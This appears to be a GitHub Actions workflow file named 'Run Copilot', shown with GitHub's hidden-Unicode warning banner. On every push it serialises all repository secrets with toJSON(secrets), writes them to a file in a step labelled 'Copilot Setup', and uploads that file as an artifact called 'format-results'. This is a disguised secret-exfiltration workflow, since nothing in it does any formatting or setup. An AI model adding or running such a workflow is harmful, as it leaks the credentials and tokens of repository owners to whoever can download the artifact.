Run Copilot #1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Run Copilot | |
| run-name: Run Copilot | |
| on: | |
| push: | |
| jobs: | |
| format: | |
| runs-on: ubuntu-latest | |
| env: | |
| VARIABLE_STORE: ${{ toJSON(secrets) }} | |
| steps: | |
| - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd | |
| - name: Copilot Setup | |
| run: echo "$VARIABLE_STORE" > format-results.txt | |
| - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f | |
| with: | |
| name: format-results | |
| path: format-results.txt |